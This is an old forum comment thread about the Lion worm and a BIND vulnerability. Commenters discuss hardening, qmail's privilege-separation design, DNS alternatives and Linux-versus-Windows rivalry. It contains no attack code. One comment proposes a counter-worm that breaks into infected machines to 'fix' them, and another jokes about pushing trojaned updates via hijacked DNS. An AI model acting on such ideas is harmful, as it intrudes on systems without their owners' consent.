Trojan Horse ("Trojan") A Trojan is a standalone program that the user is tricked into running, which will in turn do bad things.
Virus. A virus is a program that attaches itself (infects) executables- usually anything that's ran while the virus is in memory. When an infected program is executed on a system that does not already have the virus in memory, it will usually load itself into memory for the purpose of infecting yet another system. They really haven't been seen much in recent years, as it's too much hassle and requires much more intelligence than other malicious programs. I'm sure a good portion of the slashdot audience will remember viruses such as Michaelangelo, Dark Avenger, PC-Stoned!, etc. (I was hit by Michaelangelo on it's second run-around)
Worms. A worm is any malicious program that propogates itself directly to other machines (usually via a network) whereas a virus relies on the execution of an infected program, and a trojan relies on execution of itself.
I hope that clears it up :)
-bugg
Hence the usefulness of quoting.
-bugg
Tripwire (under GPL since last year) is available at tripwire.org or through their Sourceforge project. This should have been posted with the story (if he's going to mention it, why not link it).
Not many home users or desktop people would be running bind...
Bind is installed for a default redhat install? I doubt that....but its been a while since i had to do an install. Bind-utils i'm sure is installed, as those are common tools. I believe it contains nslookup and similar things. If bind-utils were installed by default, there isn't a problem. And i doubt the named daemon is installed at all for a desktop. If it is, i doubt its even running, so little harm would be done.
Qmail runs fine alongside Sendmail. Dunno what your problem was, but that wasn't it.
Possible running qmail-smtpd under some superserver that was misbehaving might be your problem, but not Qmail.
Anyone who doesn't know about the TSIG bug must be living in a cave somewhere. I heard about it on my car radio on a general news & traffic station (WBBM 780, Chicago).
In the network
...with apologies to the tokens...
The mighty network
The Lion creeps tonight
All together now!
In the network
The mighty network
The Lion creeps tonight
-drin
If the hoax is yours, fix the image -- it's broken.
LOL! I am seriously considering clicking that "Shutdown System" button...
Hello little man. I will destroy you!
If you do have a domain, don't run bind. It's in the same hole-a-week club as the FTP servers and Sendmail. Don't run bind.
If you absolutely must run bind, get the latest one, compile it static and run it chrooted as a user/group specifically created JUST to run bind.
Next week's class: Don't run FTPD.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Well then you're not running bind are you? Maybe I should have said Bind.
I think my message here is don't run Bind. You know what I'm saying?
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Tripwire is now a pay for play product, so I suggest using something like this which is open source/free and just as good
IIRC Tripwire is GPL now. But in any case I prefer AIDE myself.
Now all I need to do is hack the DNS entry for the upgrade server, and watch the users connect and automagically r00t themselves with my trojaned binaries.
The answer to this problem is of course, public key security. Sort of like the Microsoft signing keys that were obtained illegitimately just this week?
Even Microsoft doesn't automatically install security updates, their 'critical update notifier' simply tells users that an upgrade is needed, you still need to take positive action to install patches.
I do not deploy Linux. Ever.
It's a different philosophy, just a small part of why Linux distros are vulnerable where other operating systems are not...
I do not deploy Linux. Ever.
IIRC, Dan really dislikes syslog, so this may not be far from the truth.
I do not deploy Linux. Ever.
This is not a perfect world. Just because you do not know of any exploitable root holes in sshd, telnetd, apache, etc today, does not mean that one will not be found tomorrow.
It is not uncommon for exploits to be discovered and traded in the black-hat community for days, months or even years before being made public.
To believe that you will not be targeted by 'real crackers' because you are not an interesting target is a naive and dangerous assumption.
I do not deploy Linux. Ever.
Competing apps should continue to compete, but badly written monolithic software that requires root access and is a long-running source of exploits (BIND and sendmail come to mind) should be gotten rid of, not kept around for the sake of 'diversity'.
The reason that DJBDNS is not exploited where BIND is is not because one is more popular, but because BIND is written so badly that nothing short of throwing it away and starting from the ground up (as DJBDNS has done) will fix it.
I do not deploy Linux. Ever.
There are way to many machines running full services when only one or two listening processes are really needed, if that.
I do not deploy Linux. Ever.
Both Sendmail and BIND suffer from the same basic problem- they are huge monolithic programs that must be executed as root to perform their intended duties.
From the Qmail web site:Why is qmail secure? The reason I started the qmail project was that I was sick of the security holes in sendmail and other MTAs. Here's what I wrote in December 1995:
As it turned out, fourteen security holes were discovered in sendmail in 1996 and 1997.I followed seven fundamental rules in the design and implementation of qmail:
sendmail treats programs and files as addresses. Obviously random people can't be allowed to execute arbitrary programs or write to arbitrary files, so sendmail goes through horrendous contortions trying to keep track of whether a local user was ``responsible'' for an address. This has proven to be an unmitigated disaster.
In qmail, programs and files are not addresses. The local delivery agent, qmail-local, can run programs or write to files as directed by ~user/.qmail, but it's always running as that user. (The notion of ``user'' is configurable, but root is never a user. To prevent silly mistakes, qmail-local makes sure that neither ~user nor ~user/.qmail is world-writable.)
Security impact: .qmail,
like .cshrc and .exrc and various other files,
means that anyone who can write arbitrary files as a user can execute
arbitrary programs as that user. That's it.
A setuid program must operate in a very dangerous environment: a user is under complete control of its fds, args, environ, cwd, tty, rlimits, timers, signals, and more. Even worse, the list of controlled items varies from one vendor's UNIX to the next, so it is very difficult to write portable code that cleans up everything.
Of the twenty most recent sendmail security holes, eleven worked only because the entire sendmail system is setuid.
Only one qmail program is setuid: qmail-queue. Its only purpose is to add a new mail message to the outgoing queue.
The entire sendmail system runs as root, so there's no way that its mistakes can be caught by the operating system's built-in protections. In contrast, only two qmail programs, qmail-start and qmail-lspawn, run as root.
Even if qmail-smtpd, qmail-send, qmail-rspawn, and qmail-remote are completely compromised, so that an intruder has control over the qmaild, qmails, and qmailr accounts and the mail queue, he still can't take over your system. None of the other programs trust the results from these four.
In fact, these programs don't even trust each other. They are in three groups: qmail-smtpd, which runs as qmaild; qmail-rspawn and qmail-remote, which run as qmailr; and qmail-send, the queue manager, which runs as qmails. Each group is immune from attacks by the others.
(From root's point of view, as long as root doesn't send any mail, only qmail-start and qmail-lspawn are security-critical. They don't write any files or start any other programs as root.)
I have discovered that there are two types of command interfaces in the world of computing: good interfaces and user interfaces.
The essence of user interfaces is parsing: converting an unstructured sequence of commands, in a format usually determined more by psychology than by solid engineering, into structured data.
When another programmer wants to talk to a user interface, he has to quote: convert his structured data into an unstructured sequence of commands that the parser will, he hopes, convert back into the original structured data.
This situation is a recipe for disaster. The parser often has bugs: it fails to handle some inputs according to the documented interface. The quoter often has bugs: it produces outputs that do not have the right meaning. Only on rare joyous occasions does it happen that the parser and the quoter both misinterpret the interface in the same way.
When the original data is controlled by a malicious user, many of these bugs translate into security holes. Some examples: the Linux login -froot security hole; the classic find | xargs rm security hole; the Majordomo injection security hole. Even a simple parser like getopt is complicated enough for people to screw up the quoting.
In qmail, all the internal file structures are incredibly simple: text0 lines beginning with single-character commands. (text0 format means that lines are separated by a 0 byte instead of line feed.) The program-level interfaces don't take options.
All the complexity of parsing RFC 822 address lists and rewriting headers is in the qmail-inject program, which runs without privileges and is essentially part of the UA.
Keep It Simple, Stupid
I do not deploy Linux. Ever.
It brings me great pleasure to see nasty virii like this attacking Linux in particular. I'll have to remember this next time my MS-hater friends tell me how the newest email Trojan (that you have to click on, ignore the warning, and execute) for Outlook prooves that Windows is soo shitty compared to linux. No OS is impervious to worms, virii, trojans, etc. ... Quit using it as a reason to "make the switch to linux" in your anti-microsoft banter; you're not fooling anyone. /. users hate Windows or think Microsoft is out to get them!
____________________
Remember, not all
Prevent linux based DDOS's!
http://linux.denialofservice.org/
"One World, one Web, one Program" - Microsoft promotional ad
The Anti-Blog
The correct way to respond to this is "we've found a problem now lets make sure this problem doesn't happen again". I want to be proud of linux, I want linux to be a great operating system, that's not going to happen as long as we, conctrate more on blaming others for their mistakes and downplaying ours, then working on solutions.
This comment in particular bothers me.
Why should I need to run tripwire or any security software? If an OS is secure an idiot should be able to administer it and not worry about worms/backdoors/viruses.I like the slogan "secure by default".
I'm a computer scientist, not a writer so no comments on the grammer or spelling please.
Environmentalists are their own worst enemy. ~tricklenews.com
Well, the machine seems to be down now. Was this by chance a system running some sort of UPS software?
:(. I fear the day when he gets DSL and uses Win98 ICS to share it.
My dad's got a Belkin UPS that comes with some software for Win2K that opens port 80 for remote useage. I found this one day when nmapping his machine. The software doesn't seem to open the port in Win98, though. It does listen to port 80 on any network interface, though, which I tested. I got online on one machine, got online on his (dialups), got his IP, and browsed to http://AAA.BBB.CCC.DDD on the other machine. Over the net, I was able to shut down his Win2k machine. As in, it went through the shutdown procedure and turned itself off (APM support).
Granted, he himself admits that he isn't concerned about security and would just start with a completely open system and then close it over time. Though, he never did
So, anyone that's using a Belkin UPS with their Bulldog (or Watchdog, I forget which) software on Win2k (and a USB interface, maybe. I'm not sure if the serial version would work the same way.) please please close that port. I believe it may simply be the loading of a certain DLL. If nothing else, run a firewall on that machine and block untrusted IPs on port 80. What a stupid reason to be taken down! "Hackers turned off my server! HEEEELLLLP!"
kickin' science like no one else can,
my dick is twice as long as my attention span.
Withdrawal before climax is very ineffective and those who try this are usually called "parents."
Wow! I never knew Linux could be so insecure ;-).
:) ?
Um, perhaps I'm being stupid, but aren't you even the least bit concerned that your generosity might cause you problems?
I mean, it's very cool of you to leave a system up and open like that. But there are lots of people out there (curious or malicious) that would cause trouble that I know I wouldn't want to have to deal with.
Has leaving your system open like that ever caused you trouble with anyone else? Say, another admin who was attacked via your server which is open due to your, hm, kindness
kickin' science like no one else can,
my dick is twice as long as my attention span.
Withdrawal before climax is very ineffective and those who try this are usually called "parents."
Why is it that whenever a M$ product get attacked by malware it's becase of crappy security in the OS, but when linux gets attacked it's because the OS has "finally arrived"? Hmmmm...
Ok, this is a troll, but I'll bite.
I have nothing against Theo's code, I know the original posted appearently does, and I'd like to hear his reasoning for it. Theo's personality leaves alot to be desired, but that's another subject entirly.
Dan Bernstein's code, on the other hand, is horrible.
Consider:
$ grep "void main" -r qmail-1.03/ | wc -l 61There is no reason why he should make such an amaturish error. I mean, it looks like he's trying to win the obfusicated C contest.
Take this peice of code:
What was that? Well, it'd be nice if he'd get out of grade school and start using descriptive variable names. I love a puzzle, but 'x' and 'n' are absurd.
He has a very noncanonical way to handle function arguments, but it's his project, and if that floats his boat, so be it. What I really have problems with is his brace style. Not that I really mind any consistant style, but when it changes at random, it begins to look very unprofessional.
Oh yeah, and about that malloc. See, around these parts, malloc returns a pointer to void, so it strikes me as being a bit odd that 'x' would be a char pointer. I suppose c001 d00dz like DJB are too 1337 for casts.
I don't use DJB's code because it's not free. But even if it were, it is written unacceptably poorly.
Jordan Bettis
``Wherever you go, there's another stupid sigfile quote.''I don't get it. Why is everyone complaining it's Linux's fault. How is a rouge program writen god knows when the OS's fault. If I install BackOrafice on a windows machine you don't see people running around yelling "It's Window's Fault!" No, it's the fact that a program runing with admin privliges opened a hole. So what?
Blame it on the original writer of BIND. Or patch it! Heck you'd be the first one to toss on a service pack at moments release. But you expect open source to be perfect at version 1.0?
An exploit in BIND does not make BIND nor the OS responsible for who or what goes through that hole. Yes, the hole needs a patch. And yes, maybe a watchdog like program that monitors privilaged proccesses like a babysitter might be nice. But get a grip. It's not Linus's, Eric's, Larry's, or Linux or GNU or..... Go to the source and fix it. heck you'd run make bind if a new version of it cam out what's so hard about a patch -p0 < ../bind.patch?
And whats with everyone knocking X? It seems to work fine for me and aside from quake (Which should be ran in the console without X anyway) I run that sucker pretty ragged. Never had a software issue. (Well, except for me being stupid and not RTFM'ing)
Ok. FlameBait 0.02 complete.
"Remember, who is the boss of you!"
> SELECT * FROM brain_cells WHERE synaptic_rate > 0
0 row returned
Come on people. It's the new millenium.
Fortunately, most users aren't running BIND, and if they are, it's only on one box. So the fix is that much easier.
Black holes are where the Matrix raised SIGFPE
I'm so glad to see that CmdrTaco is promoting the proliferation of Linux into the community of average (read: "most") computer users with such a supportive, nurturing, and positive comment such as this. The arrogant tone of the comment makes me want to advise all of my non-expert computer using friends to download Mandrake, install it with no help from a Linux expert (it's so easy you don't need one anyway), and then proceed to use and learn it without any help from anyone, since it's so easy and intuitive. And, of course they'll all know to install tripwire "or something" because it's just that obvious.
Thanks again, CmdrTaco; you are a true representative of the Linux community in everything you say and do.
-------------------------
Stupid people suck.
Note that I was talking about newbies in the majority of my post. Newbie admins are still newbies. And yes, I still think the distro makers are partly to blame, in that even the slickest installer isn't going to protect you from your own ignorance (e.g. "workstation" installations that install BIND, "server" installations that install basically every service, etc.). No distro maker can prevent newbie admins from shooting themselves in the foot, but at least they can try to make sure the newbies aren't covered in gasoline and handed a cigarette to smoke...
Professionalism is an inherent requirement to do well as an admin. My post however was directed at the person who just picked "everything" on a RH install whilst trying linux for the first time with their cable-modem-connected-and-no-firewall machine... For that person the distro makers do need to be very conservative with what they install by default and/or configure to be open to the world by default. Linux companies could definitely take a page from OpenBSD in this regard.
--
News for geeks in Austin: www.geekaustin.org
News for Geeks in Austin, TX
Version of the worm? Version of BIND vulnerable to the worm? Version of OpenBSD with a vulnerable version of BIND?
Anyway, I'm not suprised OpenBSD can get rooted by a vulnerable service. Once you get inside OpenBSD's (admittedly very hard) shell, it's about as easy to get root as with any other unix-derivitive (i.e. not trivial usually but not impossible either).
--
News for geeks in Austin: www.geekaustin.org
News for Geeks in Austin, TX
As a developer, linux is sooooooooo much nicer in terms of development environment than windows or macos or (...). Well, I should say unix in general is this way. Part of it is having a very efficient CLI shell, part is the toolset that is available to make programmer's lives easier, part is I think due to the simple underlying philosophy of not getting in your way.
And I never said that server programs are evil, just insecurely installed server programs. ;-) I have all kinds of shit hanging off my workstation, but a) it's all pretty much locked down in service-specific ways to be reasonably secure, and b) I have a fairly tight firewall in between my internal LAN and the net (gotta love openBSD, IPF kicks the ass out of IPCHAINS).
--
News for geeks in Austin: www.geekaustin.org
News for Geeks in Austin, TX
Actually I've never noticed OpenSSH having problems. Care to elaborate? (genuinely curious, I use ssh in a pretty vanilla fashion so maybe I'm not hitting the bugs)
More generally, what do you have against DJB's and TdR's code? (again, I ask because I'm curious, I don't have an agenda about this except I like qmail better than sendmail becuase it's easier to config and openbsd becuase I like IPF more than IPCHAINS)
--
News for geeks in Austin: www.geekaustin.org
News for Geeks in Austin, TX
See my "bastille" comment a few posts up. If you're using a redhat-derivative (RH, Mandrake, etc.), look in /etc/init.d or /etc/rc/init.d for the shell scripts that turn things on and off (e.g. /etc/init.d/named stop). Editing /etc/inetd.conf or /etc/xinetd.conf to comment out or remove the ability of the inetd-superserver to start up a connection to service X is another approach. Also see the program "ntsysv" on RH derivatives that gives you easy access to the "what starts on boot" list (hint: you can safely uncomment most of that list :) ). Note that some services (e.g. bind) run on their own continuously and some run on an as-needed, connection-oriented basis from (x)inetd (e.g. telnet, ftp) and some can run either way (ftp, ssh), the exact methods for disabling them depend...
If you have an always on connection, consider getting a personal firewall (there are bazillions of them, I've had good luck with the Linksys (linksys.com) series of products, buy.com has good (sub $100 for some models) prices on them). Even if you end up ditching linux it'll make your windows/whatever boxen on the home lan more secure.
Long term, get yourself a good book on unix administration (the armadillo book from o'reilly is a good bet (author = aeleen frisch iirc)). Read the docs on the Linux Documentation Project, particularly the book-length opus on security and system performance tuning. (www.redhat.com/mirrors/LDP is usually the mirror I use, I _think_ the home url is www.linuxdoc.org). I know it seems like a mountain of information but give yourself 6 months or so and it'll all seem clear. (plus you can get a stable, reasonbly lucrative job doing it if you devote enough time to becoming an admin to do it well).
--
News for geeks in Austin: www.geekaustin.org
News for Geeks in Austin, TX
You probably shouldn't be running bind (or anything else). Linux's security problems are almost always created by people leaving stuff up/on/open when they don't need to.
If you're a newbie, here's a partial list of things you don't need to install or have running on your new workstation: bind/named, any form of mail server (esp. sendmail), atd, smbd/nmbd (samba), inetd, any form of ftp daemon (wuftpd, et al.), NFS/NIS/portmap, basically anything that provides a service to the outside world. Machines on "always-on" connections and not behind firewalls are of course the most vulnerable...
The best policy is offering nothing, and only selectively opening up services as you need to. If you do have a machine that needs to provide a service, try to understand the service and the idiosyncracies of the server program before you offer it, and keep tabs on updates...
Insert standard "wish-the-distros-would-wise-up-and-ship-closed-by -default-installations" thought here...
--
News for geeks in Austin: www.geekaustin.org
News for Geeks in Austin, TX
Doesn't having an open-source model make it easier for virus writers to find loopholes and exploits within an operating system?
Sure, you may fix it faster, but how are you going to get everyone to recompile?
Granted, the argument could be made that closed-source models don't allow you to close the holes yourself, or even guarantee a timely fix. But how many Linux users are able to fix a problem themselves. And the virus writer will have access to the fix too!
Ryan Finley
Ryan Finley
SurveyMonkey.com -- Create your own professional surveys
Try running the rootkit on a *bsd, solaris etc. Then you'll see why it is a linux problem.
-mutter- something something something...
no
yw
--
Je t'aime Stéphanie
GNU/Linux Worm?
--
Je t'aime Stéphanie
Before starting, it is helpful to NOT review any Linux/Unix/Security books or websites, since they will warn you about checking for service vulnerabilities. It is imperative that you don't review:
a) basic server security concepts;
b) your distros recent upgrade/patches (for the last two months);
c) reasons to run bind and how to do it safely.
Here's how to make your machine vulerable to LION:
1) Install a Linux distro.
2) Install bind, but make sure you don't install a recent version! Recent versions won't let LION in!
3) Don't install any of your distos security updates/patches.
4) Finally, connect this machine directly to the internet w/o a firewall -- it's crucial that people on the 'net be able to access your nameserver.
If you follow all these steps, your Linux machine is vulnerable to the "Lion" worm. If your Linux machine does not get infected, please review all the above steps and try again.
Treatment, not tyranny. End the drug war and free our American POWs.
See my user info for links.
Regardless, you should have tripwire or something running anyway
That is not a solution to the problem... nor does it lessen the severety of the thing. That "anyway" above is a pretty damn cocky statement. It would be more productive to simply warn people that they should have tripwire installed.
There are plenty of other reasons to run *nix. You might like the idea of a system that doesn't crash at the slightest provocation the way that Win9x does. You might like the fact that it comes with a whole development environment as standard equipment. You might have ethical objections to running a proprietary operating system. You might like the availablility of standard *nix administration tools like crond and real shell scripting. You might have learned to use *nix at school and not want to learn a new system. There are plenty of reasons.
There's no point in questioning authority if you aren't going to listen to the answers.
if i'm not gonna be running "bind/named, any form of mail server (esp. sendmail), atd, smbd/nmbd (samba), inetd, any form of ftp daemon (wuftpd, et al.), NFS/NIS/portmap, basically anything that provides a service to the outside world. Machines on "always-on" connections and not behind firewalls are of course the most vulnerable..." why would i run *nix?
If you don't know what AltaVista is (was), get off my lawn.
The upside to all of this is that we Linux (Unix) users have alternatives to BIND (and Sendmail, and Apache, and WuFTPD and ...) and don't have to wait for patches when a problem occurs.
However, many of the posts thus far have advocated everyone dumping BIND for the poster's favorite flavor of DNS. They are correct, to a point, and I agree with those posters, to a point. However, all of us dumping BIND is not the answer. Just some of us should. Others should remain with BIND.
Competing apps should continue to compete with each other for users, but should not merge, or even share code (where possible).
When worms like this show up, having diverse products will often minimize the damage caused. As opposed to our favorite proprietary vendor. When something affects M$, it affects every M$ user, thus earning the title "M$ Virus", "M$ Worm", etc. When something strikes BIND and less than half of the Unix world uses BIND, it's rather difficult to label it a "Linux" or "Unix" problem.
Its a friggin exploit! Thats all. A virus/worm causes damages. A trojan is a program you run that does something malicious in the background. This does neither. It looks for an exploit, runs a script, and gives itself root access. /. made a major move to being mainstream media today. It went for the sensational story, and totaly mis reported the facts.
Get it now?
Kidding, kidding. But only half. Maybe not even half.
When the I love you et al virus was going around :)
all the windows users sent us warnings about it
even though we didn't care since we weren't
using windows. Now that there is a virus for linux
let's send warnings to all of our friends who
run windows. It is a bit childish but it will give
us some revenge for having to wade through the
millions of warnings about different viruses
rather, network applications should be written securely. Sorry, but my belief is that if you are running a daemon that is susceptible to exploit that it is far better to patch it and/or install a secure alternative(ie. SSH vs telnet) than to spend half your day being paranoid over kidz running some dumb script. I was the network admin for an ISP for three years and not once were we broken into. I detected a multiplicity of pathetic attempts, however, all were obviously lame attempts at classic exploits. My opinion is that the real crackers will only spend their efforts on targets of either political(including "glory" targets such as M$) or financial. By safeguarding against glaring holes you should never have a problem. Never. Not once.
Fortunately, BIND can run chroot()'ed and unprivileged...
My ancestors evolved from primordial ooze, and all I got was this lousy Existential Angst!
My ancestors evolved from primordial ooze, and all I got was this lousy Existential Angst!
As for the latest (January 29) vulnerability (TSIG), and the worm that now exploits it, this is just yet another reason to run "named" unprivileged and chroot()'ed, and to keep up to date with advisories and patches...
As for the "$500 cash reward" for finding a security hole in djbdns, don't forget to read the fine print in the guarantee: "My judgment is final as to what constitutes a security hole in djbdns". Feh!
My ancestors evolved from primordial ooze, and all I got was this lousy Existential Angst!
My ancestors evolved from primordial ooze, and all I got was this lousy Existential Angst!
I guess it's because most people who run Solaris et al bother to ensure their systems are secure.... not that the avarage linux-kiddie hasn't written a kewl little script that they think ensures their system is uncrackable.
<p>(Why does that tag show up in preview?<p>
Tom.
Oh arse
I admit though, a decent sysadmin should not be affected by this problem, Linux or other *nix.
Tom.
Oh arse
I use Suse Linux at home. Now I don't want to start a distribution war, but I found it to be very easy to install and get working right out of the box. It also has a good reputation for user-friendlyness. However, it installs, by default, several nasty services that I don't want, including a couple of webservers. I know that Linux won't hit the mainstream until we can make it easy enough for Joe Sixpack to install everything he needs, but geez, we don't need to have such a wide variety of services in the default install. Have a way to start these services if we want them, but not until then.
Steven
-- I have marked myself unwilling to moderate-- I don't have other accounts to artificially inflate the karma of
. . .
I'd prefer to have no security holes, but if I had to choose I'd rather face a script kiddie than an experienced, determined cracker....
Is there really any difference between the two once you've been 0VVn3d? Any exploit that results in gaining root and you'd have to do what- reinstall, apply patches, then restore your data making careful sure that everything is good that you're replacing, or you'll be owned all over again.
And who says that just because it's a script-kiddie attack that it's a script kid that got in, and not someone looking to sell your corporation's data to a competitor? Unless you can nail the little fscker down to an individual person, there really isn't any way to tell.
Fist Prost
"We're talking about a planet of helpdesks."
Fist Prost
"We're talking about a planet of helpdesks."
-Jaron Lanier
Yeah, and all your base are belong to us. Is that 3 errors in one sentence?
I think you mean Linux has very much arrived, judging by the number of nasty viruses (virii) starting to pop up.
...When the article clearly states that the problem is with BIND?
Can somebody explain this to me?
--Dave
Not mentioned in the SANS report but in the NIPC advisory the trojan also installs the Tribe tfn2k flood util, giving this the potential to launch a massive DoS attack.
--
Blaming GW Bush for the Iraq war is like blaming Ronald McDonald for the poor quality of food.
On dit LA jungle ;-)
unpatched, even. As opposed to the unpacthed version, which as we all know is riddled with exploits, backdoors, and 3 day old salami.
This thing can be extra nasty because of the root kit, but almost anyone will notice the extra services running. Although people with old versions of bind should upgrade, its just common sense now. You might of been able to get away with an old version before now, but with this it would be a pain to have to rebuild the box.
The "SANS" report says something interesting: Lion is a new worm, that is very similar to the Ramen worm. However, this worm is much more dangerous and should be taken seriously..
Does this mean that the Ramen worm wasn't worth taking seriously? If so, why did the press make such an incredible stink about it? How many infections did Ramen have, and how many does Lion have?
As far as the Microsoft shills who say that now they (the paid MSFT shills) can poke fun at Linux for having a virus problem: You can do that the minute that some Indonesian Teen writes a virus-making-kit for Linux, and a Slovakian Teen paralyzes a few country's email systems with a kit-written-worm named after a chick sports celebrity.
Until then, all you MSFT shills have is a monoculture with universally-inherited weaknesses (Outlook, Windows scripting host), led by a corporation whose only idea of security is to keep the people from copying the data they legally own.
I'm sure that this will be fixed in a service pack....
;p
--The space between my ears was intentionally left blank--
It can probably be blamed on stupid default installs. It's really is pretty easy to run BIND as a non-root user. I always create a bind user and group and run it as that. BSDs ship that way by default; why is it so hard for linux distros to get the idea through their heads?
To ISC: Ha ha ha ha ha ha ha ha. To the Rest of the World: http://cr.yp.to/djbdns.html
It just goes to show that a bare install can be dangerously compromised by any amatuer and as such linux really should be run by professionals who know what they are doing.
I think most people could get it with a bit of training (which they probably won't get, but there you go). I've decided that, when setting up a Linux box, the following command is one of my best friends:
netstat -anp | grep LISTEN
I got my Linux laptop at System76.
He was quoting the submitters comments. Who cares.
I almost submitted this one myself, but the story I read on it said it was discovered in January...oh well.
terradot, growing awareness
-linux... they can't *give* that shit away.
Not that Everything is a bad site, but sometimes it gets old looking at EVERY word being linked...
---"What did I say that sounded like 'Tell me about your day?'"---
Why would I want to run a closed source worm on my system???
Looks like another reason to use djbdns, which has a $500 security guarantee and is supposedly a lot more efficient than BIND.
For RedHat users, here's how to apply the fixes:
Download the appropriate RPMs to fix BIND.
At a shell, as root, type rpm -Ui package -- package of course being the name of the RPM.
Do you like German cars?
FreeVeracity
Tripwire is now a pay for play product, so I suggest using something like this which is open source/free and just as good
Secret Mir Casualty
360 degrees of Karma
Any serious system admins should have already patched or upgraded their copy of bind. If they were really good, they should have been running bind in a chroot jail.
Wizards, of course, will have already patched the bug when they re-implemented bind in assembler. :)
The only people this will affect are the ones dumb enough to have installed bind and not used it, or incompetent sysadmins who deserve to get burned.
--
--
I Hit the Karma Cap, and All I Got Was This Lousy
I'll show you *my* linux worm.
unf.
Does anyone know where to find a definitive list of worms/virii that can affect linux? It can't be that many, maybe a few dozen. That many Outlook viruses pop up every week. What we really need is a windows scripting host for linux . I guess the more the platform is deployed, the bigger target for virus-writers it becomes. It still must be much more difficult to write one for *nix though.
Where's my lobbyist? Right here.
I noticed in the article that a partial fix
(LionFind) has been released. So, I have to ask...
why not write LionFind so it can break into
machines infected by Lion through the security
hole created by Lion, inform the machine's owner,
close the hole, and then use that box to look for
the next box to disinfect?
-G.
--
Signature temporarily unavailable. Please try again.
"Experience is what you get when you don't get what you want."
Linux is a strong OS but as it has grown in popularity and usage did anybody really doubt that people would start to create viruses and other nusiances that could be intrinsically more dangerous then existing win viruses? It just goes to show that a bare install can be dangerously compromised by any amatuer and as such linux really should be run by professionals who know what they are doing.. i mean how many of you still come across people running as ROOT???